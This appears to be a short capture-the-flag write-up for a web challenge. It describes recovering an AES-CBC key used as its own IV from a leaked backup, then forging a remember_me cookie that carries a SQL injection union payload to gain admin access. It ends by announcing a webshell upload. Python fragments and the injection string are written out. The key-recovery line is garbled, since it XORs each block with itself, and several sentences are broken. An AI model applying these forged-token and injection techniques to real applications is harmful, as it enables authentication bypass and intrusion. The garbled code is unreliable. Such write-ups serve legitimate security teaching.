At first, if you launch a dirsearch/dirbuster or anything to list files on server, you find a backup.bak, which contains the source code of the challenge. Alternatively, you click on the link in the hint. It is a zip file that contains:
The only to do is to register a user and get his remember_me cookie and script a little to build a forged token to obtain its plain version through website. I used the "aaaa" account created by someone else (thank you).
print("Token to test : %s" % genstring(new_token_blocks))
# Plain text of new_token which is given by the website => MrVg19rbkubNc1+9FaTSIIrbIMWBFrqYuLnTn5TM6v1fgQe24/bg1PwYPJE05PYBvoEkjFL51BhAaubCvJBhyQ== plain_text = "MrVg19rbkubNc1+9FaTSIIrbIMWBFrqYuLnTn5TM6v1fgQe24/bg1PwYPJE05PYBvoEkjFL51BhAaubCvJBhyQ==" plain_blocks = genblock(b64decode(plain_text)) key = '' # Apply the formula P1 XOR P3 to get the key for i in range(0,16): key += chr(plain_blocks[i]^plain_blocks[i])
The next step is to login as admin in the application. To do this, we have to found a user who is admin, or fake the system: ' and 1=0 union select username, 1 from Users where username='aaaa.
The application understand that the "aaaa" user is an admin.
Lets forge the token:
1 2 3
encryption_suite = AES.new(key, AES.MODE_CBC,key) print("Token to do SQLinjection (urlencode format): ") print(urlb64encode(encryption_suite.encrypt(padding("' and 1=0 union select username, 1 from Users where username='aaaa|thisisareallyreallylongstringasfalsfassfasfaasff"))))
As the flag is store on the website source code, we have to read it through a webshell. Why webshell? Because there is no entry from user on website which can lead to a command exec and the application offers an upload functionality.